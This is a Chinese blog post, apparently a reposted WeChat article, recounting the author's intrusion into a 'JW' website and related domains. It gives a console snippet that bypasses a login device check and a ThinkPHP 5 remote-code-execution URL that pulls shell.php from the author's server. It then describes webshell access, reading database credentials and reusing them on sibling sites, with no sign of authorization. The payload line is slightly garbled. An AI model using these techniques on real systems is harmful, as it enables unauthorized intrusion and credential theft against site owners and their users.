白虎实验室-某JW网站实战测试

原创 望仔 白虎实验室 2023-02-10 14:00 发表于山东

直接开始渗透

首先找到后台,后台直接url后跟admin直接跳转到登录框,尝试弱口令登录,提示终端不允许登录

F12看看代码,发现这里有限制,经过分析代码发现可以绕过这一限制

经过分析代码发现可以绕过这一限制,在控制台输入以下代码即可实现绕过,但弱口令没有进去

devSafe={};devSafe.checkToken=function(){return 1};devSafe.getSn=function(){return 1}

看看报错页面是什么,发现没见过

什么框架的也没搞明白(单纯技术太菜),然后就想着看看旁站好不好搞,在线工具跑完后只有这几个域名(我用的这个在线爆破的http://z.zcjun.com/),因为没几个,所以先挨个访问一下看看

第一个访问发现是thinkphp这里由于当时没有截图,后来访问发现站点关闭了,拿其他的图顶替一下

由于关闭我就文字描述一下大概的过程吧,工具扫到存在漏洞,但getshell时失败,随后手动复现发现直接写文件写不了,(试了很多payload)payload都是网上可以搜到的我这里就不放了,后想到试试远程下载文件应不行,在自己服务器开启服务,远程下载服务器显示

有访问并且是200,应该是成功了

访问一句话,可以访问到,用蚁剑连接,由于不是正规网站所以去看看数据库配置文件,并用蚁剑自带的操作数据库功能,看到后台用户名和密码,把这个记在自己的小本本上 

url/?s=/index/\think\app/invo有kefunction&function=call_user_func_array&vars[0]=copy&vars[1][]=自己服务器/shell.php&vars[1][]=shell.php

看了一圈没什么可利用的然后接着下一个,默认页面又是一个tp5

随手admin跳转到后台,发现和第一个第二个后台背景图片一样,尝试用刚才翻到的账号密码登录,这个没有像第一个后台那样有前端限制,卡顿了一下进去了,进去了,直接进去了,居然用的一套账号密码,赶紧试试第一个,结果账号密码错误,继续看看这个吧

后台图片不放了反正就是后台找到上传点,常规文件上传思路(再难我也不会,哈哈哈哈哈哈哈,掩盖下自己菜的事实)这里通过后台上传文件,并访问shell,可以访问到

尝试用蚁剑连接,连接失败,不清楚为什么

点开工具包看到躺着的webshell工具,看到好几个菜刀,抱着试一试的心态用菜刀试试,结果结果,哎成功连接

在之后就没有再操作了,看了一下其他域名发现这几个的页面一模一样,估计搞不下来果断放弃

还剩一个,刚打开看着这个背景有点熟悉

随便输入内容让其报错看到这个图标果然这不是FastAdmin框架吗随即网上查找相关漏洞

因为进不去后台只能找前台getshell的方法,找到一个随即复现,然后没有成功,不开心

我不知道是我手法有问题还是说这个站点没有这个漏洞,随即下载下源码在本地复现,成功复现,然后相同手法在站点复现,还是没成功

看到自己下载的源码中默认带了一个api.html,想试试目标站点有没有

访问试试结果还真没删,

看到有一个文件上传,随便传个文件提示需要登录后台,这个站就做到了这里,没有再继续了,有点黔驴技穷了,哈哈哈哈哈哈

总结

拿下目标后才会成就感满满。
不要怕费事,多试试不同工具,万一碰对呢

欢迎大家关注微信公众号,大家一起做大佬

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值